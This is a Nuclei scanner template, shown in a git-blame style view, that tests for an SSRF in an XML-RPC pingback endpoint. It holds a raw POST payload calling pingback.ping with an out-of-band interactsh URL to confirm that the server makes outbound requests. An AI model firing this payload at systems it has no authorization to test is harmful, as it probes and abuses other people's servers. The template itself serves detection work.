2021-08-18 11:09:22 +00:00
|
|
|
id: xmlrpc-pingback-ssrf
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: XMLRPC Pingback SSRF
|
|
|
|
author: geeknik
|
|
|
|
severity: high
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://hackerone.com/reports/406387
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: xmlrpc,hackerone,ssrf,generic
|
2021-08-18 11:09:22 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /xmlrpc/pingback HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
|
|
|
|
|
|
<?xml version="1.0" encoding="UTF-8"?>
|
|
|
|
<methodCall>
|
|
|
|
<methodName>pingback.ping</methodName>
|
|
|
|
<params>
|
|
|
|
<param>
|
|
|
|
<value>http://{{interactsh-url}}</value>
|
|
|
|
</param>
|
|
|
|
</params>
|
|
|
|
</methodCall>
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2021-09-21 09:51:35 +00:00
|
|
|
part: interactsh_protocol
|
2021-08-18 11:09:22 +00:00
|
|
|
words:
|
|
|
|
- "http"
|